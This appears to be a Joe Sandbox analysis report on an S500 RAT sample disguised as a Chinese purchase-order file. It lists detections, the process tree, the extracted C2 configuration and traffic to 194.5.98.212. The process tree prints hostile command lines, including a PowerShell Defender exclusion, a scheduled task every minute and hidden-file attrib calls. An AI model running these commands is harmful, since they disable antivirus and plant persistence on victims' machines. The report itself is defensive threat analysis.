Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe

Overview

General Information

Sample Name:#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
Analysis ID:719236
MD5:d32389e2207879f0b57835eabce6fb02
SHA1:23c2a0f0ac030766ae74b7fbfc242f3d77b0ff71
SHA256:b3f2810e4ba5c3341498d99807e2f200459eb2bd4d365b3ee52a20e9e12606c1
Tags:exe
Infos:

Detection

S500Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected S500Rat
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Uses cmd line tools excessively to alter registry or file data
.NET source code contains potential unpacker
Uses schtasks.exe or at.exe to add and modify task schedules
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Yara detected ProcessChecker
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe (PID: 5220 cmdline: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe MD5: D32389E2207879F0B57835EABCE6FB02)
    • NRHRAS.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\NRHRAS.exe" MD5: 9B1C1C565D60ED67CB6E1986ACD95C3A)
      • attrib.exe (PID: 3080 cmdline: C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 2932 cmdline: C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5148 cmdline: timeout 3 MD5: EB9A65078396FB5D4E3813BB9198CB18)
        • Chrome.exe (PID: 4204 cmdline: "C:\Users\user\AppData\Roaming\Stub\Chrome.exe" MD5: 9B1C1C565D60ED67CB6E1986ACD95C3A)
          • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2468 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5880 cmdline: schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1 MD5: 15FF7D8324231381BAD48A052F85DF04)
    • wscript.exe (PID: 5860 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • Acrobat Reader DC.exe (PID: 768 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • Acrobat Reader DC.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • Acrobat Reader DC.exe (PID: 2740 cmdline: "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe" MD5: D32389E2207879F0B57835EABCE6FB02)
  • cleanup

Malware Configuration

Threatname: S500 Rat

{"C2 list": ["127.0.0.1"], "Ports": ["7000"], "Mutex": "S500Mutex_YMXBWEGOQS", "Server Cert": "MIIE8DCCAtigAwIBAgIQAP+4gOK1KW7lhJ89mRqYpzANBgkqhkiG9w0BAQ0FADAZMRcwFQYDVQQDDA5TNTAwUkFUIFNlcnZlcjAgFw0yMjA2MTcxNTE5MzBaGA85OTk5MTIzMTIzNTk1OVowGTEXMBUGA1UEAwwOUzUwMFJBVCBTZXJ2ZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC3fyvyU4d/ZPjNQwlc/qOjufRLmEq7ZTMC4TTI5fRqE5f6rpjDRvLpVXWlb0vZezT9WjP7IouHQAtLW8ekT6VNfGc9AjlOeGEOPFq8Rx09uivwXFMRDF//eAKdkRJQ+ViVzoW78VOQKPVIvobAqlDhW4VkarXJcJ78xD1Sd6v4GH7pzDv71qQ+phI6o1TnWuUj4V6oD9kFwUjPy76H4Q5nrD1I7Buw8kk5yYNoh49sSkQt47PgXA21n3kWJ4+je4Owvoi4QI1Pt6BRd8upx03Wa3PxY7BLOXU7GA1fLiBMeC2nPQeuupWqO2QSu4vPvf6TNZMCWSV65AEZ1+X66xlH+PFlUGikLy0Wz65orKv2MvciNX/msyi2T55PF00nXs1b8oNq5Ap6DwTJBuzfoaRfuHjw0klLPfiZpAcnPr3vdoeUiV7S4r9tJumBgzAwpgKfAl/C8fGrDJFudCAnsrCPr9k6Vv193oE5G5vCTkE0va82xqhwCTZ5vOx3fLj6FR/YppbxFNq36ItTjPFE7V5hHKGTqWGxd8xwt/6gmyEl6Sl2IbhQ3E65Ft3ylSJmiFbq2hNvN0b7IKII/8EJ6MZV9bfexCHxbShmq6xevLjEt4RJypBcuP2p8alt8+9h6p31gWDx2u6WmGXlOLBV/WLYDZXJtqU9iX+fIrlVZm3YaQIDAQABozIwMDAdBgNVHQ4EFgQUhS2paTMkp4RHfUQ1rm9SeEIHK+4wDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAQPhYoe1Z0R5YOEBlWn8kSMQO87OURcff/jzHnl4lj38d67N5Rn4iXYRODbA/fJvLX+Vs5G3ZXSDbEln7Wclmqbn9M/sNXBNmST7nEEH+/rZ6IfUbN+XCzvHImbJJ+EONTElJ1ExHuzmgzVP/Wv3JSl0IOxNQ2P3+WwKMuYcVarUaDIQVvmJyUkBS97Qho3N/hTDFb7hay2tCJt7aXkSTCKHTlVsbo50slFz4lrKEmUD/2NCFfMMQhrtHQzWIao7ri37X9eTJTC/tPcIbdPxao6fY9WozFsBM+YLDmxo5RGfqV8PLBA5NXBicyeMqdZnRJ2UTQ4NgtLN2sI5q0LDqVagp0Qy+bUfF7wUq0E8X/xvNlLtFXG8oFkSAdcrvi9eJa5W2LsoX5adcycUjdH8D/Ax4msgtkXH7/gsPJbT7v/T7wxg2MqdxdLHvEgnrd195fETnoZMJAOlzSyLqBzV51iLwz0CApsczHtDe9wwl9gdVagA9dE1R1hYU90IjK8ZzM7www77PIjvmeIq0CZ/W34RooRYJAATiQqLtrGSKM6PXOt1vHqBkN6KmfV5fp7RYXutGMKxHtV03pwf33N5quaFq6Sm88r+RYFYH8JB+slEEUdBaPCa/AYRXWWfaV35/4fWkOj2CaS8VaupB7fodhTx/Klk9dyO+Y5YInnXVU+w="}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\UALDJT.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
    C:\Users\user\AppData\Roaming\Stub\Chrome.exeJoeSecurity_S500RatYara detected S500RatJoe Security
      C:\Users\user\AppData\Local\Temp\NRHRAS.exeJoeSecurity_S500RatYara detected S500RatJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_S500RatYara detected S500RatJoe Security
          00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_S500RatYara detected S500RatJoe Security
            00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
              00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                  Click to see the 2 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  1.2.NRHRAS.exe.2cda580.1.unpackJoeSecurity_S500RatYara detected S500RatJoe Security
                    1.0.NRHRAS.exe.2f0000.0.unpackJoeSecurity_S500RatYara detected S500RatJoe Security
                      1.2.NRHRAS.exe.2cda580.1.raw.unpackJoeSecurity_S500RatYara detected S500RatJoe Security

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:192.168.2.7194.5.98.2124974055522849885 10/10/22-07:46:46.795098
                        SID:2849885
                        Source Port:49740
                        Destination Port:5552
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeAvira: detection malicious, Label: HEUR/AGEN.1203089
                        Source: C:\Users\user\AppData\Local\Temp\UALDJT.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeAvira: detection malicious, Label: HEUR/AGEN.1229397
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeAvira: detection malicious, Label: HEUR/AGEN.1203089
                        Antivirus / Scanner detection for submitted sample
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeAvira: detected
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeVirustotal: Detection: 79%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeMetadefender: Detection: 42%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeVirustotal: Detection: 79%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeMetadefender: Detection: 42%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeReversingLabs: Detection: 73%
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeJoe Sandbox ML: detected
                        Source: 0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.4110c48.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.40e8450.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpackMalware Configuration Extractor: S500 Rat {"C2 list": ["127.0.0.1"], "Ports": ["7000"], "Mutex": "S500Mutex_YMXBWEGOQS", "Server Cert": "MIIE8DCCAtigAwIBAgIQAP+4gOK1KW7lhJ89mRqYpzANBgkqhkiG9w0BAQ0FADAZMRcwFQYDVQQDDA5TNTAwUkFUIFNlcnZlcjAgFw0yMjA2MTcxNTE5MzBaGA85OTk5MTIzMTIzNTk1OVowGTEXMBUGA1UEAwwOUzUwMFJBVCBTZXJ2ZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC3fyvyU4d/ZPjNQwlc/qOjufRLmEq7ZTMC4TTI5fRqE5f6rpjDRvLpVXWlb0vZezT9WjP7IouHQAtLW8ekT6VNfGc9AjlOeGEOPFq8Rx09uivwXFMRDF//eAKdkRJQ+ViVzoW78VOQKPVIvobAqlDhW4VkarXJcJ78xD1Sd6v4GH7pzDv71qQ+phI6o1TnWuUj4V6oD9kFwUjPy76H4Q5nrD1I7Buw8kk5yYNoh49sSkQt47PgXA21n3kWJ4+je4Owvoi4QI1Pt6BRd8upx03Wa3PxY7BLOXU7GA1fLiBMeC2nPQeuupWqO2QSu4vPvf6TNZMCWSV65AEZ1+X66xlH+PFlUGikLy0Wz65orKv2MvciNX/msyi2T55PF00nXs1b8oNq5Ap6DwTJBuzfoaRfuHjw0klLPfiZpAcnPr3vdoeUiV7S4r9tJumBgzAwpgKfAl/C8fGrDJFudCAnsrCPr9k6Vv193oE5G5vCTkE0va82xqhwCTZ5vOx3fLj6FR/YppbxFNq36ItTjPFE7V5hHKGTqWGxd8xwt/6gmyEl6Sl2IbhQ3E65Ft3ylSJmiFbq2hNvN0b7IKII/8EJ6MZV9bfexCHxbShmq6xevLjEt4RJypBcuP2p8alt8+9h6p31gWDx2u6WmGXlOLBV/WLYDZXJtqU9iX+fIrlVZm3YaQIDAQABozIwMDAdBgNVHQ4EFgQUhS2paTMkp4RHfUQ1rm9SeEIHK+4wDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAQPhYoe1Z0R5YOEBlWn8kSMQO87OURcff/jzHnl4lj38d67N5Rn4iXYRODbA/fJvLX+Vs5G3ZXSDbEln7Wclmqbn9M/sNXBNmST7nEEH+/rZ6IfUbN+XCzvHImbJJ+EONTElJ1ExHuzmgzVP/Wv3JSl0IOxNQ2P3+WwKMuYcVarUaDIQVvmJyUkBS97Qho3N/hTDFb7hay2tCJt7aXkSTCKHTlVsbo50slFz4lrKEmUD/2NCFfMMQhrtHQzWIao7ri37X9eTJTC/tPcIbdPxao6fY9WozFsBM+YLDmxo5RGfqV8PLBA5NXBicyeMqdZnRJ2UTQ4NgtLN2sI5q0LDqVagp0Qy+bUfF7wUq0E8X/xvNlLtFXG8oFkSAdcrvi9eJa5W2LsoX5adcycUjdH8D/Ax4msgtkXH7/gsPJbT7v/T7wxg2MqdxdLHvEgnrd195fETnoZMJAOlzSyLqBzV51iLwz0CApsczHtDe9wwl9gdVagA9dE1R1hYU90IjK8ZzM7www77PIjvmeIq0CZ/W34RooRYJAATiQqLtrGSKM6PXOt1vHqBkN6KmfV5fp7RYXutGMKxHtV03pwf33N5quaFq6Sm88r+RYFYH8JB+slEEUdBaPCa/AYRXWWfaV35/4fWkOj2CaS8VaupB7fodhTx/Klk9dyO+Y5YInnXVU+w="}
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 192.168.2.7:49740 -> 194.5.98.212:5552
                        Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
                        Source: Joe Sandbox ViewIP Address: 194.5.98.212 194.5.98.212
                        Source: global trafficTCP traffic: 192.168.2.7:49702 -> 194.5.98.212:5552
                        Source: NRHRAS.exe, 00000001.00000002.300171430.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004422FE InternetQueryDataAvailable,InternetReadFile,10_2_004422FE
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.212

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected S500Rat
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004443FC GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,10_2_004443FC
                        Source: Acrobat Reader DC.exe, 0000000A.00000002.288878742.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041380110_2_00413801
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0042200C10_2_0042200C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0042096F10_2_0042096F
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004119E310_2_004119E3
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041C9AE10_2_0041C9AE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040FA1010_2_0040FA10
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041A21710_2_0041A217
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0042435D10_2_0042435D
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004033C010_2_004033C0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00423C8110_2_00423C81
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0044663B10_2_0044663B
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00420EC010_2_00420EC0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004096A010_2_004096A0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00444FD210_2_00444FD2
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0041380112_2_00413801
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0042200C12_2_0042200C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0042096F12_2_0042096F
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004119E312_2_004119E3
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0041C9AE12_2_0041C9AE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0040FA1012_2_0040FA10
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0041A21712_2_0041A217
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0042435D12_2_0042435D
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004033C012_2_004033C0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00423C8112_2_00423C81
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00442E0C12_2_00442E0C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_0044663B12_2_0044663B
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00420EC012_2_00420EC0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004096A012_2_004096A0
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00444FD212_2_00444FD2
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00446313 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00446313
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\NRHRAS.exe AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Stub\Chrome.exe AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe B3F2810E4BA5C3341498D99807E2F200459EB2BD4D365B3EE52A20E9E12606C1
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
